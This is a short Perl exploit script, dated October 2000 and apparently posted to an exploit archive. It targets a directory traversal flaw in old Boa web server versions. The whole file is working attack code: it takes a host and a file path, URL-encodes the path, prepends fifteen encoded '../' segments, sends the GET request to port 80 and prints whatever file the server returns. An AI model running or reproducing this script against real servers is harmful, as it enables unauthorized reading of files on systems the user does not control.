#!/usr/bin/perl -w

## Boa Web Server Daemon Exploit / Found by Lluis Mora 
##
## Exploit written by teleh0r based on an advisory 
## by Lluis Mora / llmora@s21sec.com / S21SEC
## (http://www.s21sec.com/en/avisos/s21sec-005-en.txt)
##
## This exploit will show the content of any file
## which is readable by the boa http daemon. Should
## work on Boa Web Servers below version v0.94.8.3
## but only til v0.92.x (See advisory for details)  
##
## http://teleh0r.cjb.net/ || teleh0r@doglover.com

use Socket; use strict;

if (@ARGV < 2) {
    print("Usage: $0 <host> <file>\n");
    exit(1);
}

my ($host, $file, $url_encoded, $exploit_string,
    $iaddr, $paddr, $proto, $response);

($host, $file) = @ARGV;

$file =~ s/(\w)/sprintf("%%%x",ord($1))/ge;

# Make the below string long to be on the safe side!
# ("/%2E%2E/" eq "/../" (URL-encoded.)); ;)

$url_encoded = "/%2E%2E/"x"15";
$exploit_string = "GET $url_encoded$file HTTP/1.0\015\012";

$iaddr = inet_aton($host)                    || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr)             || die("Error: $!\n");
$proto = getprotobyname('tcp')               || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr)                      || die("Error: $!\n");
send(SOCKET,"$exploit_string\015\012", 0)    || die("Error: $!\n");

while (defined($response = <SOCKET>)) {
    print("$response");
}
close(SOCKET); exit(1);
#                   www.hack.co.za     [12 October 2000]#